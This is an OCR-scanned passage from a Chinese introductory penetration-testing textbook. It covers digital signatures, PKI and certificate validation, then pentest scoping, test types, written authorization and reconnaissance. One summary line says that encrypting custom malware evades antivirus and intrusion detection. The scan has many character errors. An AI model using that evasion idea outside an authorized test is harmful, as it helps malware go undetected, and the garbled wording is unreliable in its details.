上 任何 人 都 无 法 创建 与 你 完全 相同 的 签名 (不 考虑 伪造 签名 的 情况 )。 此 外 ， 这 种 类 型 的 签 
名 附 在 纸 质 文件 上 时 ， 表 明 你 认同 的 是 放置 在 你 面前 的 文档 ， 而 不 是 此 文档 在 签署 前 后 的 
其 他 版 本 ， 这 提供 了 确保 文档 完整 性 的 方法 ， 因 为 对 文档 所 做 的 任何 更 改 都 有 在 更 改过 程 
中 丢失 你 的 签名 的 风险 。 

将 其 与 电子 版 本 的 签名 对 比 ， 后 者 通过 向 文档 加 入 一 个 唯一 的 签名 ， 可 以 快速 实现 不 
可 否认 性 、 身 份 验证 和 完整 性 检查 。 需 要 使 用 何 种 前 文 讨论 的 技术 以 达成 该 目标 应 该 很 明 
显 。 如 果 此 时 你 想到 了 公 钥 或 非 对 称 加 密 系统 以 及 哈 希 ， 请 你 给 自己 打 个 高 分 ， 因 为 它们 
正 是 用 于 构建 数字 签名 的 技术 。 


举例 来 说 ， 设 想 需 要 通信 的 双方 需要 在 文档 中 附加 一 个 签名 ， 以 确保 它 来 源 于 其 中 
一 方 ， 而 不 是 试图 进行 欺诈 或 窃取 信息 的 人 。 为 便于 叙述 ， 在 此 将 双方 分 别称 为 Samus 和 
Ridley。 在 本 场景 中 ，Samus 要 Ridley 发 送 一 份 数字 签名 的 文件 ，Ridley 将 使 用 签名 对 文档 
进行 检查 ， 以 确保 其 符合 所 需 的 安全 要 求 。 

首先 ，Samus 创 建 一 条 消息 ; 为 便于 叙述 ， 假 设 这 是 一 封 电子 邮件 。 当 她 创建 消息 并 
决定 创建 数字 签名 时 ， 她 必须 遵循 一 系列 步骤 。 她 需要 执行 的 第 一 步 是 使 用 哈 希 算法 为 邮 
件 生成 一 个 哈 希 值 。 该 哈 希 值 将 作为 电子 邮件 的 唯一 不 可 复制 的 指纹 ， 以 确保 其 他 文档 无 
法 冒充 原始 文件 。 在 生成 哈 希 值 后 ， 即 可 执行 第 二 步 ， 其 中 Samus 使 用 她 的 私 钥 加 密 该 哈 
希 值 ， 并 在 将 邮件 发 送 给 Ridley 之 前 ， 将 此 加 密 后 的 哈 希 值 捆绑 或 绑 定 到 电子 邮件 中 。 需 
要 注意 的 是 在 这 个 时 间 点 ， 使 用 的 密 钥 是 Samus 自 己 的 私 钥 ， 因 为 她 需要 一 种 方式 来 证 明 
该 文档 是 来 自 于 她 而 不 是 其 他 人 ， 而 私 钥 则 是 唯一 一 个 她 且 只 有 她 独 有 的 事物 。 

在 Samus 完 成 上 述 过 程 并 将 文档 发 送 给 Ridley 后 ， 将 进行 下 一 步 ， 即 由 Ridley 验 证 文 
档 。Ridley 的 验证 方法 是 ， 首 先 检查 消 因 来源， 在 本 例 中 是 Samus， 然 后 获取 她 的 公 钥 。 
取得 她 的 公 钥 后 ，Ridley 将 使 用 该 公 钥 解密 传输 的 签名 部 分 。 如 果 签 名 正常 ， 解 密 未 出 现 
任何 问题 ， 则 Ridley 即 可 基于 公 钥 密码 学 的 特性 ， 确 认 文 档 源 目 Samus， 而 不 是 任何 其 他 
人 。 执 行 此 步骤 后 ，Ridley 已 经 进行 了 身份 验证 和 不 可 否认 性 验证 。 接 下 来 Ridley 要 做 的 
则 是 证 明 该 文件 没有 被 恶意 或 意外 修改 ， 或 是 没有 在 传输 过 程 中 损坏 。 为 了 执行 此 操作 ， 
现在 Ridley 需 要 用 到 解密 后 的 哈 希 值 ， 然 后 使 用 相同 的 操作 ( 即 同 一 个 哈 希 算 法 ) 计 算 电 子 
邮件 的 哈 希 值 。 在 Ridley 使 用 相同 算法 重新 对 文档 进行 哈 希 操作 后 ， 只 需要 将 签名 中 的 哈 
希 值 部 分 与 Ridley 得 出 的 哈 希 值 进行 简单 比较 即 可 。 如 果 它 们 匹配 ， 则 文档 未 被 更 改 ;， 如 
果 不 匹 配 ， 则 文档 已 更 改 ， 这 样 即 可 确认 /否决 消息 的 完整 性 。 

加 密 过 程 只 用 于 哈 希 值 ; 它 并 不 应 用 于 邮件 本 身 。 这 一 事实 很 重要 的 原因 是 ， 你 需要 
记 住 数字 签名 本 身 并 不 能 为 传输 消息 提供 保密 性 。 和 传统 墨水 签名 一 样 ， 这 方面 并 不 是 它 
关注 的 内 容 。 


3.7 ”使 用 PKI 


如 何 知道 茶 个 给 定 方 或 个 人 实际 拥有 或 被 分 配 了 茶 个 特定 的 密 钥 ? 这 是 本 书 已 介绍 的 
密码 系统 的 一 个 大 问题 ， 因 为 已 经 介绍 过 的 方法 中 没有 哪 种 可 以 将 密 钥 以 除了 简单 承诺 外 
的 方式 附加 到 特定 的 个 体 。 笠 和 运 的 是 ， 通 过 组 合 运 用 多 种 技术 、 流 程 和 软件 ， 人 们 构建 了 
一 种 称 为 公 钥 基础 设施 (PKD 的 系统 。 


PKI 系 统 提供 了 一 种 将 一 个 密 钥 对 安全 地 附加 到 某 一 特定 方 或 个 人 的 方法 ， 因 此 成 为 
执行 该 任务 的 常用 手段 。 首 先 ，PKI 系 统 自身 可 以 负责 密 钥 对 ( 即 前 文 介绍 的 公 钥 和 私 钥 ) 
的 生成 任务 。 这 样 ， 我 们 剩 下 的 工作 就 是 找到 一 种 将 密 钥 明确 分 配给 特定 个 人 的 方式 ， 可 
以 通过 数字 证 书 的 方式 来 实现 。 

数字 证 书 其 实 并 不 是 一 个 十 分 令 人 陌生 的 概念 ， 可 以 想象 一 份 驾驶 执照 之 类 的 凭据 ， 
它 就 符合 数字 证 书 的 许多 要 求 。 驾 驶 执照 包含 一 些 内 容 信息 ， 例 如 有 效 日 期 、 序 列 号 、 执 
照 颁 发 对 象 的 签名 、 准 驾车 型 、 颁 发 执照 的 州 或 地 区 ， 甚 至 还 有 颁发 执照 的 实体 的 全 息 印 
刷 签名 。 如 果 仔 细 观 察 数字 证 书 ， 即 可 发 现 很 多 相同 的 项 。 证 书 通常 会 有 一 个 序列 号 、 一 
个 有 效 期 ， 以 及 签发 该 证 书 的 用 途 ， 例 如 数字 证 书 或 加 密 ， 证 书 中 还 有 证 书 分 配对 象 的 个 
体 的 公 钥 ， 以 及 证 书 发 行者 的 数字 签名 ， 这 些 都 用 于 证 明证 书本 身 的 真实 性 。 谨 记 当 生成 
数字 证 书 时 ， 该 人 员 实 际 上 正在 注册 到 PKI 系 统 ， 并 同意 将 由 证 书 颁发 机 构 (CA) 跟 踪 并 存 
储 该 信息 。 此 外 ， 在 生成 证 书 时， 还 会 同时 生成 密 钥 对 以 及 用 于 附加 到 数字 凭据 的 公 铀 。 

与 驾驶 执照 非常 相似 ， 数 字 证 书 仅 在 特定 条 件 下 发 出 ， 而 且 希 望 加 入 系统 的 请 求 者 必 
须 符合 其 要 求 ， 否 则 将 一 直 拒绝 向 其 签发 证 书 ， 直 到 满足 要 求 为 止 。 一 旦 满足 要 求 认 证 机 
构 将 向 其 签发 数字 证 书 ， 然 而 ， 如 果 在 证 书 发 布 后 的 任何 时 间 ， 他 们 违反 了 要 求 ， 或 给 他 
们 签发 的 凭据 或 密 钥 发 生 了 滥用 甚至 失控 ， 则 可 以 吊销 该 赁 据 。 一 旦 凭据 被 吊销 ， 其 本 身 
以 及 与 之 关联 的 密 钥 均 将 失效 ， 这 意味 着 使 用 已 经 吊销 的 密 钥 执 行 的 任何 操作 将 无 法 如 之 
前 一 样 通过 验证 。 


3.7.1 从 证 证 书 


在 获得 颁发 的 数字 证 书后 并 试图 使 用 它 时 ， 必 须 由 证 书 的 使 用 对 象 验证 该 证 书 。 这 人 么 
做 是 合理 的 ， 束 像 在 茶 个 你 不 认识 的 人 回 你 提供 一 份 凭 据 时 ， 你 可 以 选择 即便 不 认识 他 们 
也 采信 和 他们 的 言辞 ， 也 可 以 选择 检查 凭据 的 颁发 者 ， 并 回 他 们 验证 该 凭据 是 否 确实 有 效 。 
弟 运 的 是 ， 数 字 证 书 声明 了 证 书 的 颁发 者 ， 作 为 证 书 拥有 者 ， 你 有 条 件 检查 它 是 否 有 效 ， 
以 决定 是 否 信任 拿 出 证 书 并 希望 与 你 共事 的 人 。 

在 实际 中 ， 这 意味 着 当 一 方 癌 太一 方 提交 一 个 数字 证 书 时 ， 双 方 将 把 该 证 书 提交 给 一 
个 可 信 第 三 方 ， 以 验证 其 有 效 性 。 可 信 第 三 方 只 是 证 书 贫 发 机 构 的 一 个 别称 罢了 。 可 信 第 
三 方 必 须 是 一 个 通信 双方 (即使 他 们 并 不 直接 认识 对 方 ) 同 时 信任 的 实体 。 这 是 系统 能 够 工 
作 的 关键 。 按 照 可 信 第 三 方 的 定义 ， 它 是 一 个 所 有 人 均 信任 其 正确 性 和 可 信 性 的 实体 。 第 
三 方 可 判定 文档 的 权威 性 和 可 信赖 性 。 可 信 第 三 方 可 以 是 商业 的 ， 也 可 以 是 公司 内 部 专 
用 的 。 

在 证 书 通过 验证 后 ， 即 认为 可 继续 任何 之 前 所 请 求 或 需要 进行 的 与 当前 正在 使 用 的 密 
钥 ( 例 如 数字 签名 ) 相 关 的 操作 。 


和 涌 远 测 式 入 | 
3.7.2， 构建 公 钥 基础 设施 (PKI) 结 构 


鉴于 PKI 系 统 存在 于 Internet 以 及 私人 公司 和 机 构 中 ， 本 节 将 介绍 如 何 构建 它 。 需 要 注 
意 的 是 ，PKI 并 非 某 个 特定 软件 或 硬件 ， 它 实际 上 是 一 个 由 一 系列 的 流程 和 过 程 组 成 的 系 
统 ， 而 这 些 流程 和 过 程 又 由 通用 的 软 硬 件 解决 方案 支持 。 通 用 意味 着 有 一 个 已 知 的 标准 ， 
可 供 任何 希望 开发 PKI 感 知 应 用 程序 的 供应 商 参 考 ， 以 使 其 软件 能 成 功 与 PKI 交 互 。 由 于 
该 标准 已 经 发 布 且 被 普遍 接受 ， 因 此 我 们 可 以 使 用 来 自 不 同 供应 商 和 来 源 的 应 用 程序 和 技 
术 ， 而 且 它 们 都 能 协同 工作 。 只 要 它们 能 够 使 用 同一 标准 与 PKI 系 统 进 行 交 互 ， 就 并 不 用 
在 意 其 内 部 实现 。 

当 创 建 PKI 系 统 时 ， 首 个 组 件 是 证 书 颁发 机 构 。 由 于 CA 负责 颁发 、 注 册 、 验 证 和 扩 
销 证 书 ， 因 此 必须 首先 启动 该 组 件 。 在 任何 PKI 系 统 中 设置 的 第 一 个 CA 是 该 给 定 系统 的 根 
CA。 在 根 CA 下 ， 会 有 子 CA， 也 称 为 从 属 CA。CA 都 执行 相同 的 功能 ， 但 具有 不 同 的 权威 
性 级 别 ， 这 取决 于 CA 在 金字 塔 型 CA 体系 内 所 处 的 位 置 ， 而 根 CA 则 位 于 金字 塔 顶 。 

在 按 需 设置 好 根 CA 和 所 有 从 属 CA 后 ， 即 可 安装 和 设置 PKI 感 知 应 用 程序 。 需 要 为 PKI 
感知 应 用 程序 进行 的 设置 并 不 多 ; ”当前 PKI 感 知 应 用 程序 中 的 大 多 数 因为 是 为 某 些 本 身 即 
为 PKI 感 知 的 操作 系统 (如 Windows 或 Android) 构 建 的 ， 所 以 才 得 以 宣称 其 PKI 感 知性 。 
此 ， 这 些 应 用 程序 理解 PKI 的 能 力 是 从 操作 系统 中 继承 的 ， 并 且 不 必 实 现 特定 的 功能 。 

进行 到 这 一 步 时 确实 仍 需 要 完成 的 唯一 操作 是 识别 出 应 用 程序 可 信任 的 CA， 而 大 
多 数 情 况 下 ， 只 需要 通过 在 操作 系统 中 定义 该 CA 的 名 称 即 可 完成 该 操作 。 在 该 操作 完成 
后 ，CA 即 可 继续 流程 ， 回 符合 要 求 且 已 被 授权 可 获取 证 书 的 申请 者 发 布 证 书 和 密 钥 对 。 


3.8 ”本 合 小 结 


密码 学 是 与 保护 所 有 形式 的 信息 有 关 的 知识 体 。 通 过 使 用 加 密 技 术 ， 可 以 保护 信息 的 
机 密 性 和 完整 性 。 加 密 技 术 提 供 了 防止 信息 被 颖 探 的 手段 和 保持 信息 原封 不 动 的 方法 。 

对 于 渗透 测试 者 而 言 ， 使 用 加 密 技术 可 以 提供 一 种 逃避 杀毒 软件 和 入 侵 检测 系统 基于 
查找 特征 内 容 或 格式 来 检测 的 方法 。 对 一 个 定制 的 恶意 软件 进行 加 密 可 以 有 效 阻止 杀毒 软 
件 的 检测 。 


3.9 “过 题 


1. 为 何 使 用 对 称 加 密 ? 


2. 何谓 算法 ? 

3. 为 何 使 用 隐 写 术 (steganography)? 
4. 隐 写 术 相 对 于 密码 学 有 何 优 点 ? 
5. 为 何 使 用 哈 希 而 不 是 加 密 ? 


渗 


在 前 面 儿童 中， 已 详细 介绍 了 渗透 测试 、 操 作 系 统 和 网 络 以 及 密码 学 等 相关 知识 ， 本 
章 将 介绍 用 于 进行 渗透 测试 的 方法 学 。 一 般 情况 下 ,测试 前 要 先 做 一 些 准备 工作 ,例如 确 
定 为 何 需要 进行 渗透 测试 并 选择 测试 类 型 。 在 完成 这 些 准 备 工 作 之 后 ， 就 将 获得 测试 的 书 
面 许可 ， 然 后 即 可 开始 进行 渗透 测试 。 测 试 往往 从 收集 一 些 后 期 用 于 网 络 扫描 和 更 具 攻 击 
性 操作 的 信息 开始 。 在 完成 所 有 的 渗透 测试 并 且 获 得 所 有 有 头 漏洞 和 漏洞 利用 信息 后 ， 需 
要 创建 一 个 风险 缓解 计划 (Risk Mitigation Plan， RMP)。RMP 应 当 清晰 地 记录 所 有 已 经 进 
行 的 操作 ,包括 其 结果 、 和 解释 和 适当 的 建议 。 最 后 ， 需 要 清除 测试 期 间 所 进行 的 所 有 


更 改 。 
本 章 将 学 习 : 
人 确定 为 何 需要 进行 测试 
人 gg 选择 测试 的 类 型 
& 获取 测试 许可 并 拟 制 合同 
名 ”进行 渗透 测试 时 遵循 法 律 法 规 


4.1 ”确定 工作 的 目标 和 光 围 


我 们 都 听 过 这 么 一 名 老话 “凡事 预 则 立 ， 不 预 则 废 ”。 当 然 ， 这 人 句 话 同样 适用 于 渗透 
测试 。 为 了 确保 测试 成 功 ， 需 要 做 大 量 的 准备 工作 。 

首先 ， 需 要 和 客户 召开 一 个 讨论 测试 过 程 的 项 目 局 动 会 。 该 会 议会 讨论 很 多 不 同 问 
题 ， 但 特别 要 注重 的 是 寻找 测试 的 有 关 范 围 、 目 标 、 相 关 方 以 及 其 他 问题 等 信息 。 在 会 议 
结束 前 ， 必 须 明确 测 斌 目标。 否则， 测试 必然 效率 低下 ， 并 且 判 定 测 试 是 否 得 到 了 满意 的 
结果 是 非常 困难 甚至 不 可 能 的 。 渗 透 测试 应 该 最 终 聚 焦 于 发 现 并 确定 目标 网 络 上 漏洞 的 范 
围 。 此 外 ， 测 试 范围 应 确定 测试 包含 与 排除 的 内 容 ， 实 质 上 吏 是 确定 测试 的 边界 。 测 试 范 
围 还 必须 是 具体 的 ， 并 将 测试 实际 取得 成 功 的 标准 纳入 其 中 。 

还 有 其 他 一 些 需 要 提出 的 问题 : 

@ 为何 有 必要 进行 渗透 测试 ? 

@ 被 测试 的 组 织 的 功能 或 使 命 是 什么 ? 


测试 有 何 约 束 条 件 或 行动 规则 ? 
哪些 数据 和 服务 将 纳入 测试 作为 其 一 部 分 ? 
数据 的 所 有 者 是 谁 ? 

测试 结束 时 期 望 得 到 何 种 结果 ? 

在 提交 结果 时 会 对 其 进行 何 种 处 理 ? 
预算 是 多 少 ? 

预期 成 本 是 多 少 ? 

将 提供 哪些 资源 ? 

在 测试 中 允许 采取 何 种 行动 ? 

何 时 进行 测试 ? 

内 部 人 员 是 否 得 到 通知 ? 

测试 是 以 黑 盒 还 是 白 盒 方式 执行 ? 
何 种 条 件 可 判定 测试 成 功 ? 

崇 急 联系 人 是 何人 ? 


测试 中 还 应 包括 的 内 容 


还 应 考虑 是 否 需要 执行 以 下 攻击 以 获取 客户 谋求 的 结果 (确保 客户 批准 每 一 个 类 
别 的 攻击 及 其 包含 的 内 容 )。 

社会 工程 任何 系统 中 最 弱 的 安全 要 素 都 是 人 的 因素 。 技 术 能 够 协助 和 加 强人 员 
因素 ， 但 仍然 存在 许多 必须 通过 培训 和 实践 来 解决 的 弱点 ， 而 在 很 多 情况 下 这 些 培 
训 和 实践 是 严重 缺乏 的 。 所 有 渗透 测试 都 应 该 考虑 通过 组 织 的 人 员 来 测试 组 织 的 安 
全 性 。 请 参阅 第 1$ 章 ， 以 获取 更 多 相关 信息 。 

应 用 程序 安全 性 测试 这 种 测试 形式 专门 针对 定位 和 识别 应 用 程序 中 缺陷 的 特 
征 。 此 类 测试 可 以 作为 独立 测试 进行 ， 也 可 作为 一 套 完 整 测试 中 的 一 部 分 进行 。 在 
存在 定制 的 应 用 程序 或 环境 并 且 需 要 对 应 用 程序 进行 仔细 检查 的 情况 下 ， 可 能 要 求 
进行 该 测试 。 

物理 渗透 测试 人 们 使 用 一 些 强 大 的 物理 安全 方法 来 保护 敏感 数据 。 该 类 测试 通 
常 适 用 于 军队 和 政府 机 构 。 在 测试 中 ， 要 检测 所 有 的 网 络 设备 和 接 入 点 遭受 安全 入 
侵 的 可 能 性 。 在 某 些 情况 下 ， 这 种 测试 可 能 会 尝试 从 一 些 不 安全 的 设备 或 其 他 资产 
中 收集 信息 ， 并 可 视 为 社会 工程 测试 的 一 部 分 。 


不 难 预想 ， 确 定 测试 目标 会 是 敲定 起 来 比较 困难 的 事项 之 一 。 许 多 客户 会 将 你 视 为 


帮助 他 们 达到 练习 目的 的 渗透 测试 员 。 在 与 客户 进行 面谈 时 ， 请 尽量 用 清晰 易 懂 的 语言 
明 测 试 目标 。 在 充分 理解 测试 目标 前 ， 切 勿 结束 会 议 。 强 烈 建 议 在 与 客 尸 进行 此 类 会 议 之 
前 ， 先 准备 好 竺 解决 问题 的 清单 和 会 议 议程 表 ， 以 确保 解决 所 有 问题 并 避免 时 间 浪 费 。 


另 一 件 需要 在 会 议 期 间 讨论 和 改进 的 事项 是 测试 的 时 间 安排 和 总 体 持续 时 间 。 这 是 一 


个 极其 重要 的 细节 ， 因 为 茶 些 客户 可 能 希望 仅 在 特定 时 间 进 行 测试 ， 以 避免 其 基础 设施 和 
业务 流程 发 生 中 断 。 该 需求 必须 与 在 工作 中 或 压力 下 评估 组 织 的 需求 进行 权衡 ， 因 为 下 班 
时 段 的 测试 无 法 提供 同样 的 运行 条 件 。 任 何 类 型 的 组 织 都 不 希望 渗透 测试 影响 到 正常 的 运 
营 。 所 以 ， 执 行 诸如 DoS 攻 击 或 其 他 类 型 的 攻击 性 测试 有 可 能 使 客户 不 屏 。 简 而 言 之 ， 要 
注意 任何 形式 的 限制 ， 如 果 需 要 打破 限制 ， 务 必 与 客户 确认 。 

会 议 期 间 还 需要 做 的 男 外 一 个 选择 是 确定 测试 的 知情 范围 。 虽 然 总 会 有 部 分 员工 知晓 
测试 ， 以 便 核 实 、 监 督 测试 可 以 支持 组 织 提出 的 测试 目标 并 在 遇 到 需要 不 了 解 测 试 的 员工 
执行 测试 的 状况 时 给 予 支 持 ， 但 同 过 多 的 员工 通报 测试 会 影响 测试 结果 的 准确 性 ， 因 为 如 
果 知 道 正在 进行 测试 ， 人 部会 有 意 无 意 地 调整 自己 的 工作 习惯 。 


4.2 ”选择 要 执行 的 测试 类 型 


渗透 测试 被 视 为 常规 IT 安 全 风险 管理 流程 的 一 部 分 ， 它 可 能 由 具体 情况 所 产生 的 内 部 
或 外 部 需求 驱动 。 无 论 对 系统 内 部 还 是 外 部 进行 风险 评估 ， 要 记 住 的 是 ， 渗 透 测 试 虽然 只 
是 环境 安全 性 评估 的 一 个 组 成 部 分 ， 但 它 往往 也 是 最 重要 的 部 分 ， 因 为 它 能 提供 安全 问题 
的 真实 证 据 。 尽 管 如 此 ， 渗 透 测 试 应 该 是 对 组 织 进行 全 面 安全 性 审查 的 一 部 分 。 

渗透 测试 中 可 能 需要 测试 的 项 目 如 下 : 

@ 应 用 程序 
IT 基础 设施 
网 络 设备 
通信 链 路 
物理 安全 与 措施 
心理 问题 

@ 策略 问题 

在 许多 情况 下 ， 渗 透 测试 对 一 个 组 织 而 言 是 最 具 攻 击 性 的 测试 类 型 。 与 其 他 测试 产 出 
的 是 有 关 组 织 的 强项 和 弱点 的 信息 不 同 ， 只 有 渗透 才 会 具备 导致 生产 环境 产生 中 断 的 真正 
风险 。 客 户 往往 不 能 真正 理解 ， 虽 然 渗透 测试 由 受信 任 方 进行 ， 但 仍然 存在 一 定 程度 的 风 
险 ， 包 插 实 际 上 的 系统 崩 演 和 造成 损害 。 一 定 要 确保 客户 始终 了 解 测试 对 其 业务 产生 的 潜 
在 风险 ， 并 确保 他 们 在 发 生 灾 难 性 事故 前 已 经 做 好 备份 工作 并 准备 好 其 他 应 对 措施 。 

在 进行 渗透 测试 时 ， 通 常 可 采用 以 下 方法 之 一 : 

墨盒 测试 ” 黑 盒 测 试 是 一 种 最 为 接近 外 部 攻击 状况 的 测试 ， 有 时 也 被 称 为 外 部 测试 。 
在 此 类 测试 中 ， 测 试 人 员 像 一 个 真正 的 攻击 者 一 样 进行 远程 测试 ， 所 知 的 信息 将 会 非常 有 
限 ， 可 能 往往 只 知道 公司 的 名 字 。 通 过 使 用 本 书 中 介绍 的 多 种 技术 ， 渗 透 测 试 人 员 能 够 逐 
步 获取 更 多 关于 目标 的 信息 并 最 终 渗 透 进 入 公司 。 同 时 ， 和 需要 记录 并 跟踪 系统 中 的 漏洞 ， 


Ee 湖 j 秀 测 上 式 入 门 实 战 


并 在 测试 文档 中 辣 客 户 报告 这 些 漏 洞 ， 还 需要 尝试 用 自 喘 的 知识 来 量化 任何 损失 可 能 对 组 
织造 成 的 影响 。 完 成 测试 后 ， 要 生成 一 个 文档 ， 该 文档 包含 所 有 与 目标 安全 评估 和 将 识别 
的 风险 分 类 并 转换 到 业务 环境 中 的 相关 必要 信息 。 

灰 盒 测试 ”在 此 类 测试 中 ， 获 得 的 知识 同样 十 分 有 限 ， 可 能 只 比 黑 盒 测试 中 可 获知 
的 信息 多 出 诸如 操作 系统 或 其 他 数据 之 类 的 信息 。 在 这 种 测试 中 ， 预 先 提供 一 些 关 键 但 却 
无 法 触及 的 资源 的 信息 的 情况 并 不 罕见 。 采 取 该 做 法 的 理念 是 ， 如 果 提 前 知道 一 些 关 键 资 
源 ， 就 可 以 寻找 并 以 这 些 资 源 为 目标 。 但 是 ， 一 旦 发 现 其 中 一 个 目标 ， 就 会 被 告知 终止 测 
试 并 回 客 户 报告 发 现 的 结果 。 

白 盒 测试 ”在 白 盒 测试 中 ， 测 试 方 充 分 了 解 目标 环境 的 结构 和 组 成 ， 因 此 这 种 测试 有 
时 也 被 称 为 内 部 测试 。 该 类 测试 比 黑 盒 测 试 和 灰 盒 测试 的 分 析 更 加 深入 。 白 盒 测 试 通常 由 
组 织 中 的 内 部 团队 或 人 员 执行 ， 作 为 一 种 快速 发 现 问题 并 在 外 部 人 员 定 位 和 利用 这 些 问题 
前 修复 它们 的 手段 。 白 盒 测试 发 现 和 解决 安全 漏洞 的 时 间 和 成 本 比 黑 盒 测试 要 低 一 些 。 

表 4.1 总 结 了 这 些 测试 的 不 同 之 处 。 

表 4.1 不 同 测试 类 型 的 差异 
墨盒 测试 灰 盒 测试 日 盒 测 试 

不 知道 也 不 会 提供 网 络 内 部 情况 | 有 限 了 解 网 络 内 部 工作 情况 测试 人 员 知 道 要 评估 环境 的 所 有 
需要 很 长 的 时 间 ， 因 为 要 收集 | 需要 一 定 的 时 间 ， 因 为 已 经 提供 部 i 因为 知道 环境 
信息 的 全 部 信息 


4.3 通过 签订 合同 获取 许可 


进行 渗透 测试 要 说 记 的 关键 原则 之 一 是 要 获得 明确 无 歧义 的 测试 许可 。 虽 然 获得 测试 
所 需 的 支持 等 事项 也 很 重要 ， 但 更 重要 的 是 将 许可 记录 成 文 。 让 授权 测试 的 人 员 在 项 目 和 
计划 上 签字 ， 并 保存 他 们 的 联系 信息 以 防 万 一 。 如 果 没 有 这 种 授权 ,测试 过 程 中 可 能 会 遇 
到 很 多 障碍 ， 包 括 宣称 该 测试 从 未 被 授权 。 

这 一 授权 可 采用 何 种 形式 ? 虽然 采用 口头 授权 不 行 ， 但 其 他 方式 还 是 可 以 接受 的 。 如 
果 你 是 一 名 外 部 承包 商 ， 那 么 和 俭 普 一 份 合同 就 足以 表达 并 实施 行动 许可 。 对 于 内 部 测试 而 
言 ， 其 正当 性 可 由 电子 邮件 或 签字 文书 (或 二 者 并 用 ) 确 认 。 

在 没有 此 类 文书 和 许可 的 情况 下 ， 进 行 测试 是 很 不 明知 的。 该 许可 不 仅 授 权 进 行 测 
试 ， 而 且 在 有 人 质疑 是 否 应 该 进行 测试 时 可 作为 “ 免 罪 金牌 ”。 


不 要 低估 获得 测试 许可 和 书面 许可 的 重要 性 ， 事 实 上 已 有 控告 和 成 功 起 诉 在 未 获得 授 
权 的 情况 下 就 进行 测试 的 案例 。 

初次 会 议 之 后 ， 应 制定 一 份 描述 测试 目标 和 参数 的 合同 。 以 下 是 合同 中 可 能 包含 的 一 
些 项 : 

要 评估 的 系统 或 评估 对 象 (Targets Of Evaluation，TOE) 你 要 与 客户 共同 确定 哪些 
系统 需要 在 渗透 测试 中 评估 。 它 们 可 以 是 任何 被 认为 对 组 织 有 价值 或 由 于 合 规 性 原因 需要 
测试 的 系统 。 

预知 的 风险 ”在 任何 渗透 测试 过 程 中 ， 都 可 能 发 生 一 些 计 划 外 的 情况 。 考 虑 到 在 测试 
中 ， 即 使 做 了 充分 的 计划 和 准备 ， 也 仍然 可 能 友 生 不 可 预期 的 情况 ， 通 过 提前 通知 客户 ， 
可 以 降低 宕 机 引起 的 意外 冲击 ， 同 时 可 提前 准备 以 减轻 影 啊 。 

时 间 表 ”为 要 执行 的 测试 编制 一 份 切 实 可 行 的 时 间 表 。 确 保 为 执行 测试 、 检 查 并 验证 
结果 以 及 发 现 问 题 分 配 了 充足 的 时 间 。 另 外 ， 测 试 时 间 设 置 中 还 应 该 包括 每 天 和 每 周 执行 
测试 的 时 间 段 ， 因 为 攻击 的 结果 和 啊 应 会 随 着 测试 的 时 段 变 化 而 变化 。 

系统 知识 ”请 牢记 ， 虽 然 你 并 非 必 须 对 每 一 个 需要 测试 的 系统 了 如 指 掌 ， 但 至 少 应 该 
对 环境 有 一 些 基 本 了 解 。 这 一 了 解 会 有 助 于 保护 你 和 测试 系统 。 如 果 测 试 的 是 内 部 系统 ， 
了 解 正 在 测试 的 系统 应 该 不 难 。 

发 现 严 重 问题 时 应 采取 的 措施 ”发 现 一 个 安全 漏洞 后 不 要 束 此 罢 手 。 继 续 测 试 以 寻找 
可 能 存在 的 其 他 问题 。 虽 然 在 所 有 系统 失 能 和 /或 月 泪 后 不 应 该 继续 测试 ， 但 是 在 用 尽 测 
试 选 项 前 ， 仍 应 继续 测试 。 如 果 没 有 发 现任 何 漏洞 ， 说 明 检 查 得 不 够 仔细 。 如 果 发 现 了 严 
重 问题 ， 务 必 将 此 情况 及 时 共享 给 核心 人 员 ， 以 便 在 漏洞 被 利用 之 前 将 其 墙 塞 。 另 外 ， 应 
要 求 客户 明确 “紧急 汇报 ”的 标准 ， 所 谓 紧 急 汇 报 ， 是 指 如 果 团 队 发 现 了 对 网 络 构成 严重 
威胁 的 情况 ， 必 须 立 即 停止 测试 并 告知 客户 。 这 样 做 可 让 团队 无 须 在 发 现 每 一 漏洞 时 ， 都 
要 停止 测试 并 犹豫 是 要 继续 测试 还 是 与 客户 联系 。 

可 交付 成 果 ”这 包括 漏洞 扫描 报告 ， 以 及 一 份 概述 了 要 解决 的 重要 漏洞 及 所 需 实施 的 
对 抗 手段 的 更 高 层次 报告 。 

作为 一 条 经 验 ， 应 将 任何 能 够 说 明 期 望 、 规 则 、 责 任 和 交付 成 果 等 的 信息 纳入 合同 。 
在 合同 里 附加 的 澄清 性 信息 越 多 ， 对 于 你 和 客户 承 越 有 好 处 ， 因 为 这 样 做 可 以 避免 以 后 产 
生 误 解 。 


4.3.1 收集 情报 


在 计划 到 位 并 受 善 准备 完毕 之 后 ， 即 可 开始 信息 采集 过 程 。 虽 然 该 阶段 并 不 直接 对 目 
标 开展 工作 ， 但 它 仍 代表 着 正式 测试 的 开始 。 在 这 一 阶段 会 获得 大 量 信息 。 


行事 要 有 条 理 
有 时 该 步骤 也 被 称 为 踩点 而 不 是 侦察 或 信息 收集 。 这 些 用 词 都 没 问 题 。 在 任何 
情况 下 ， 这 个 过 程 都 需要 有 条 不 豪 地 进行 。 在 本 阶段 漫不经心 或 者 盲目 从 事 的 信息 
收集 过 程 将 导致 在 后 期 浪费 时 间 ， 最 坏 的 情况 是 导致 攻击 彻底 失败 。 明 智 而 细心 的 
测试 者 会 花费 大 量 时 间 在 这 个 阶段 收集 信息 并 对 信息 进行 确认 。 


如 何 获取 信息 ?这 么 说 吧 ， 有 浩如烟海 的 相关 资源 可 用 于 该 工作 ， 需 要 你 自己 决定 哪 
些 资源 有 用 以 及 哪些 没 用 。 请 寻找 那些 可 以 帮助 构建 可 用 于 改进 后 续 攻 击 的 目标 脉络 图 的 
工具 。 可 从 任何 地 方 收集 信息 ， 例 如 搜索 引擎、 财务 公开 信息 、 网 站 、 招 聘 网 站 ， 甚 至 可 
利用 社会 工程 学 的 手段 (请 稍 安 勿 躁 ， 稍 后 本 书 会 介绍 这 些 方法 )。 

在 本 阶段 结束 时 ， 应 形成 一 份 全 面 的 可 备 后 续 利用 的 信息 列表 。 下 面 的 列表 能 提供 可 
用 信息 类 型 的 一 些 感性 认识 : 

公开 信息 ”从 招聘 网 站 等 处 收集 目标 可 能 公开 的 所 有 信息 ， 如 主机 和 网 络 信息 。 

领域 共性 (Sector-Specific Commonalities)” 查 明 特 定 环境 中 所 使 用 的 操作 系统 ， 若 
有 可 能 ， 包 括 Web 服 务 器 和 Web 应 用 程序 数据 。 

